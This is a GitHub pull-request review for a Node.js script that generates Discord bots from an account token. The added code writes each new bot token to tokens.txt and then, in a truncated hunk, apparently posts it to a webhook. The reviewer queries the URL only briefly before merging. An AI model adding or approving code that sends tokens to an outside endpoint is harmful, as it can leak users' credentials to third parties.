### PR TITLE
adding a Intents

### PR DESCRIPTION
**Pull request by v8j**

### CODE REVIEW

File: index.js [hunk 1]
```diff
@@ -1,7 +1,10 @@
 const { default: axios } = require("axios");
 const config = require("./config.json");
+const fs = require("fs");
+console.clear();
```
Comment (FnrDev) [inline index.js]: This line is not required.

File: index.js [hunk 2]
```diff
@@ -13,12 +16,15 @@ async function generateBot(token, name) {
     },
     data: {
       name,
+      bot_public: false,
```
Comment (FnrDev) [inline index.js]:
```suggestion
      bot_public: true,
```

**Review by FnrDev — CHANGES_REQUESTED** [review]
👋 Hey @v8j, thanks for your contribution I think these changes are better

File: index.js (hunk 2 above)
Comment (FnrDev) [reply index.js]: The reason why this should be true is premium bots can be invited by others instead of the account owner

File: index.js (hunk 1 above)
Comment (v8j) [reply index.js]: > This line is not required.

not required but for the show >__<

**Comment by v8j** [comment]
all fixed now

File: index.js (hunk 1 above)
Comment (FnrDev) [reply index.js]: It will be better if we remove this line, for more clean codebase

Comment (v8j) [reply index.js]: done

File: index.js [hunk 3]
```diff
@@ -36,6 +41,29 @@ async function generateBot(token, name) {
   }).catch(console.error);
 
   console.log(getToken.data);
+
+  fs.appendFile(
+    "tokens.txt",
+    JSON.stringify(` ${botData.token} `),
+    function (err) {
+      fetch("webhook", {
```
Comment (FnrDev) [inline index.js:49]: make sure about this url

Comment (v8j) [reply index.js:49]: its working for me ,__,

Comment (FnrDev) [reply index.js:49]: aright

**Review by FnrDev — APPROVED** [review]

File: index.js (hunk 2 above)
Comment (v8j) [reply index.js]: i don't think so 
it was working with false

Comment (FnrDev) [reply index.js]: Cuz you're the owner of the bot

**Pull request merged**